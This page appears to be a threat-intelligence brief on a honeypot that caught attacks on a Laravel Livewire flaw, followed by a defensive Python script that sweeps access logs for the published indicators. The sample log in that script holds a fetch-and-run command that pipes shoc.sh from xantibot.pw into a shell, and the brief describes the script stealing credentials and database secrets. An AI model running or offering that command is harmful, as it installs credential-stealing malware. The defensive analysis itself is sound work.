Hasty Briefs

What My Livewire Honeypot Caught in Its First 60 Hours

2 days ago
  • #honeypot
  • #cybersecurity
  • #exploitation
  • Livewire-honeypot, a FastAPI service that mimics a Laravel application vulnerable to CVE-2025-54068, caught its first real-world exploitation attempt: an Indonesian operator using Livepyre.
  • The attack followed a three-request pattern from source IP 140.213.220.239 and ended with the target downloading a shell script (shoc.sh) from xantibot[.]pw that harvests credentials and database contents from compromised PHP applications.
  • shoc.sh searches for configuration files (e.g., .env, wp-config.php), extracts the database credentials and the Laravel APP_KEY, uploads its findings to a DigitalOcean Spaces bucket, and reports progress through a Telegram bot.
  • No persistence or backdoor is left on compromised systems; the operation is a one-shot data theft for resale, so the only indicators are in request logs, not on disk.
  • The C2 domain xantibot[.]pw has been active since at least February 2026, is hosted on Alibaba Cloud Singapore, and is tied to multiple victim sites, yet has no prior public threat-intelligence coverage.
  • The honeypot was hit 60 hours after going live, most likely located through certificate transparency (CT) logs, which suggests attackers watch new-certificate feeds and start probing fresh hosts within days.
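Because the post says the only indicators of this activity live in request logs, the natural defensive check is a log sweep for the published IOCs plus the short multi-request burst that precedes the download. The script below is an added example written for this page, not code from the honeypot project or the original post. It assumes a combined-style access log with an optional trailing request-body field (a constructed format), uses the domain, IP and script name quoted above, and treats "three requests within 60 seconds" as an assumed heuristic for the three-request pattern, since the post does not give the exact requests.

```python
"""Sweep web request logs for the xantibot[.]pw / shoc.sh indicators and the request burst.

Added example for this page; not the honeypot's own code. Log format and thresholds are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List

# Indicators quoted in the summary above (domain kept defanged, as published).
DEFANGED_DOMAIN = "xantibot[.]pw"
SOURCE_IP = "140.213.220.239"
SCRIPT_NAME = "shoc.sh"

# Constructed sample log, combined format plus an optional quoted request body at the end.
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges; the payload line is illustrative.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:12:00:01 +0000] "GET / HTTP/1.1" 200 512
140.213.220.239 - - [10/Mar/2026:12:00:05 +0000] "GET /livewire/livewire.js HTTP/1.1" 200 1024
140.213.220.239 - - [10/Mar/2026:12:00:07 +0000] "POST /livewire/update HTTP/1.1" 200 88
140.213.220.239 - - [10/Mar/2026:12:00:09 +0000] "POST /livewire/update HTTP/1.1" 200 88 "curl -s http://xantibot.pw/shoc.sh | sh"
198.51.100.9 - - [10/Mar/2026:13:00:00 +0000] "GET /wp-login.php HTTP/1.1" 404 0
""".splitlines()

# ip ident user [timestamp] "request" status bytes ["body"]   (assumed layout)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
    r'(?: "(?P<body>.*)")?$'
)


def refang(indicator: str) -> str:
    """Turn a defanged indicator (xantibot[.]pw, hxxp://) back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


@dataclass
class Hit:
    line_no: int
    src_ip: str
    reasons: List[str] = field(default_factory=list)


def scan(lines: List[str]) -> List[Hit]:
    """Return one Hit per log line that matches any published indicator."""
    domain = refang(DEFANGED_DOMAIN)
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real sweep would count these separately
        blob = line.lower()
        reasons = []
        if m["ip"] == SOURCE_IP:
            reasons.append("known source ip")
        if domain in blob:
            reasons.append(f"c2 domain {domain}")
        if SCRIPT_NAME in blob:
            reasons.append(f"dropper name {SCRIPT_NAME}")
        if reasons:
            hits.append(Hit(n, m["ip"], reasons))
    return hits


def bursts(lines: List[str], window_s: int = 60, min_requests: int = 3) -> Dict[str, float]:
    """Map source IP -> seconds spanned by its first min_requests requests inside window_s.

    The 3-in-60s threshold is an assumption standing in for the post's three-request pattern.
    """
    by_ip: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            by_ip[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    flagged: Dict[str, float] = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        for i in range(len(stamps) - min_requests + 1):
            span = (stamps[i + min_requests - 1] - stamps[i]).total_seconds()
            if span <= window_s:
                flagged[ip] = span
                break
    return flagged


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no} {hit.src_ip}: {', '.join(hit.reasons)}")
    for ip, span in bursts(SAMPLE_LOG).items():
        print(f"burst from {ip}: 3 requests in {span:.0f}s")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; the burst heuristic will also flag ordinary crawlers, so treat it as a triage filter and let the IOC matches carry the weight. Matching on the lowercased whole line rather than individual fields is deliberate: the domain or script name may appear in the path, a header, or the body depending on how the log was captured.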